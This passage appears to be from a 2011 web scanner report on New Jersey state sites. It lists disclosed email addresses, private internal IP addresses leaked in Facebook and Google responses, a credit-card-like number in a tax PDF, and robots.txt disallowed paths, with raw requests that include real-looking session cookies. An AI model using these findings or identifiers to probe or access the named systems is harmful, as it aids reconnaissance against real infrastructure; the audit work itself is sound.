User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:40:51 GMT
Content-type: text/html
Content-Length: 10719

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>
<meta http-equiv
...[SNIP]...
<span class="TextBoldGreen">nj.taxationenews@treas.state.nj.us</span>
...[SNIP]...

14.56. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Issue detail

The following email addresses were disclosed in the response:

NewJerseyLottery@lottery.state.nj.us
name@domain.com

Request

GET /LOT_LVC/jsp/lvc1_0_vip_reg.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=C2D1D22C30B568638365FC0BBB7F4E87;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
Validate() {

       form = document.registration;

       // validate email
       if (form.email.value=="" ) {
alert("Please enter your Email Address with \n"+
"the standard name@domain.com format.");
                form.email.focus();
return false;
        }
        else{
        if (!VerifyEmail(form.email.value)) {
alert("Please enter your Email Address with \n"+
"the standard name@domain.com format.");
                       form.email.focus();
return false;
    }
       }
       if (form.email.value.toLowerCase() != form.email_confirm.value.toLowerCase() ) {
       alert("Please confirm your Em
...[SNIP]...
<a href="mailto:NewJerseyLottery@lottery.state.nj.us">NewJerseyLottery@lottery.state.nj.us</a>
...[SNIP]...

15. Private IP addresses disclosed previous next
There are 17 instances of this issue:

http://511ny.org/
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js
http://www.facebook.com/NewJerseyLottery
http://www.facebook.com/feeds/page.php
http://www.facebook.com/feeds/page.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.google.com/sdch/vD843DpA.dct

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

15.1. http://511ny.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://511ny.org
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.213.53

Request

GET / HTTP/1.1
Host: 511ny.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.2. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y0/r/8Wh3q4omJpY.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/y0/r/8Wh3q4omJpY.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:04:31 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 31841
Vary: Accept-Encoding
Cache-Control: public, max-age=31368342
Expires: Tue, 10 Jul 2012 03:25:22 GMT
Date: Wed, 13 Jul 2011 01:59:40 GMT
Connection: close

/*1310354861,169776321*/

.async_throbber .async_saving{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/zb/r/GsNJNwuI-UM.gif) no-repeat right;padding-right:20px}
.async_throbber_left .async_savi
...[SNIP]...

15.3. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/sdwD1rGJXK2.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.182

Request

GET /rsrc.php/v1/y3/r/sdwD1rGJXK2.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:06:36 GMT
X-FB-Server: 10.138.69.182
Content-Length: 7216
Vary: Accept-Encoding
Cache-Control: public, max-age=31371947
Expires: Tue, 10 Jul 2012 04:25:27 GMT
Date: Wed, 13 Jul 2011 01:59:40 GMT
Connection: close

/*1310358195,176833974*/

.fbDarkWidget .fan_box,
.fbDarkWidget .uiStream .uiStreamMessage{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background
...[SNIP]...

15.4. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y5/r/OWWAkKnpuow.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.198

Request

GET /rsrc.php/v1/y5/r/OWWAkKnpuow.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:32:14 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Content-Length: 93392
Vary: Accept-Encoding
Cache-Control: public, max-age=31368542
Expires: Tue, 10 Jul 2012 03:28:42 GMT
Date: Wed, 13 Jul 2011 01:59:40 GMT
Connection: close

/*1310354862,169775558*/

if (window.CavalryLogger) { CavalryLogger.start_js(["MpKhp"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

15.5. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ya/r/fvZFkQjGc7h.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.186

Request

GET /rsrc.php/v1/ya/r/fvZFkQjGc7h.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:27:05 GMT
X-FB-Server: 10.138.69.186
Content-Length: 48700
Vary: Accept-Encoding
Cache-Control: public, max-age=31368935
Expires: Tue, 10 Jul 2012 03:35:15 GMT
Date: Wed, 13 Jul 2011 01:59:40 GMT
Connection: close

/*1310355389,176833978*/

if (window.CavalryLogger) { CavalryLogger.start_js(["T8H\/g"]); }

var XD={_callbacks:[],_opts:{autoResize:false,allowShrink:true,channelUrl:null,hideOverflow:false,newResize
...[SNIP]...

15.6. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yd/r/kBiKV12z46R.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.182

Request

GET /rsrc.php/v1/yd/r/kBiKV12z46R.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:06:45 GMT
X-FB-Server: 10.138.64.182
Content-Length: 20669
Vary: Accept-Encoding
Cache-Control: public, max-age=31496902
Expires: Wed, 11 Jul 2012 15:08:02 GMT
Date: Wed, 13 Jul 2011 01:59:40 GMT
Connection: close

/*1310483326,176832694*/

.connect_comment_widget{margin:0 4px;padding:5px 0;position:relative}
.connect_comment_widget .nub{background:transparent url(http://static.ak.fbcdn.net/rsrc.php/v1/zv/r/agyQ
...[SNIP]...

15.7. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yo/r/FbBFWVaYbEC.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/yo/r/FbBFWVaYbEC.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:05:07 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 17175
Vary: Accept-Encoding
Cache-Control: public, max-age=31368436
Expires: Tue, 10 Jul 2012 03:26:56 GMT
Date: Wed, 13 Jul 2011 01:59:40 GMT
Connection: close

/*1310354861,169776317*/

form{margin:0;padding:0}
label{cursor:pointer;color:#666;font-weight:bold;vertical-align:middle}
label input{font-weight:normal}
textarea,.inputtext,.inputpassword{border:1px
...[SNIP]...

15.8. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yo/r/uOvB-PjImrg.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /rsrc.php/v1/yo/r/uOvB-PjImrg.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:27:05 GMT
X-FB-Server: 10.138.17.184
Content-Length: 15643
Vary: Accept-Encoding
Cache-Control: public, max-age=31369776
Expires: Tue, 10 Jul 2012 03:49:16 GMT
Date: Wed, 13 Jul 2011 01:59:40 GMT
Connection: close

/*1310356044,176820664*/

if (window.CavalryLogger) { CavalryLogger.start_js(["YM2NU"]); }

function ConnectSocialWidget(a,b){ConnectSocialWidget.setInstance(b,this);ConnectSocialWidget.delayUntilDisp
...[SNIP]...

15.9. http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yu/r/rK9hU7iYtfp.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/yu/r/rK9hU7iYtfp.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 17:59:23 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 40262
Vary: Accept-Encoding
Cache-Control: public, max-age=31431782
Expires: Tue, 10 Jul 2012 21:02:42 GMT
Date: Wed, 13 Jul 2011 01:59:40 GMT
Connection: close

/*1310418127,169776068*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fZYUE"]); }

void(1);if(!window.skipDomainLower&&navigator&&navigator.userAgent&&document.domain.toLowerCase().match(/(^|
...[SNIP]...

15.10. http://www.facebook.com/NewJerseyLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/NewJerseyLottery

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.10.42

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.11. http://www.facebook.com/feeds/page.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/feeds/page.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.156.43

Request

GET /feeds/page.php?id=147895761925432&format=rss20 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.12. http://www.facebook.com/feeds/page.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/feeds/page.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.49.57

Request

GET /feeds/page.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.13. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.12.63

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/app/delaware-fresh/id446665507
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

15.14. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.8.77

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/app/delaware-fresh/id446665507
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

15.15. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.252.73

Request

Response

15.16. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.4.47

Request

Response

15.17. http://www.google.com/sdch/vD843DpA.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU
If-Modified-Since: Tue, 12 Jul 2011 14:04:29 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Wed, 13 Jul 2011 03:50:56 GMT
Date: Wed, 13 Jul 2011 11:39:23 GMT
Expires: Wed, 13 Jul 2011 11:39:23 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&q=related: http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &rct=j&sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=www.google
...[SNIP]...
<a href="/search?hl=en&q=related:http://172.31.196.197:8888/search?q=cache: &cd= &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...

16. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/taxation/pdf/other_forms/tgi-ee/2010/10_1040i.pdf

Issue detail

The following credit card number was disclosed in the response:

5566117220944000

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /treasury/taxation/pdf/other_forms/tgi-ee/2010/10_1040i.pdf HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:35 GMT
Content-length: 1501901
Content-type: application/pdf
Last-modified: Mon, 20 Jun 2011 15:33:04 GMT
Etag: "16eacd-4dff6830"
Accept-ranges: bytes
Connection: close

%PDF-1.7%....
316 0 obj<</Linearized 1/L 1501901/O 321/E 260768/N 64/T 1495517/H [ 1347 2912]>>endobj
xref
316 51
0000000016 00000 n
0000004259 00000 n
0000004394 00000 n
0000004613
...[SNIP]...
eType/FontDescriptor 327 0 R/LastChar 146/Widths[250 0 0 0 500 0 0 0 333 333 0 0 250 333 250 0 500 500 500 500 500 500 500 0 500 500 0 0 0 0 0 0 0 722 667 0 0 0 556 0 722 333 389 0 611 0 722 0 0 0 667 556 611 722 0 944 0 0 0 0 0 0 0 0 0 444 500 444 500 444 333 500 500 278 278 500 278 778 500 500 500 0 333 389 278 500 500 722 500 500 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333]/BaseFont/HEOQTE+TimesNewRomanPSMT/Fir
...[SNIP]...

17. Robots.txt file previous next
There are 4 instances of this issue:

http://nj.gov/
http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif
http://www.courts.state.ny.us/home.htm
http://www.state.nj.us/patentbank/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

17.1. http://nj.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nj.gov
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nj.gov

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:38:26 GMT
Content-length: 180
Content-type: text/plain
Last-modified: Tue, 06 Feb 2007 15:32:05 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /cgi-bin/homelandsecurity/
Disallow: /cgi-bin/dobi/licenseesearch/
Disallow: /cgi-bin/consumeraffairs/search/
Disallow: /cgi-bin/state/
Disallow: /Support/

17.2. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sdc.state.nj.us
Path:	/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sdc.state.nj.us

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:610"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:38:28 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2007 WebTrends Inc. All rights reserved.
# $DateTime: 2007/02/02 09:50:38 $
#
######################
...[SNIP]...

17.3. http://www.courts.state.ny.us/home.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.courts.state.ny.us
Path:	/home.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.courts.state.ny.us

Response

HTTP/1.1 200 OK
Content-Length: 1091
Content-Type: text/plain
Last-Modified: Mon, 11 Apr 2011 15:08:03 GMT
Accept-Ranges: bytes
ETag: "705ffc405af8cb1:85a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:41:06 GMT
Connection: close

User-agent: *
Disallow: /ea/ResourceCenter/cdr/
Disallow: /reporter/3dseries/
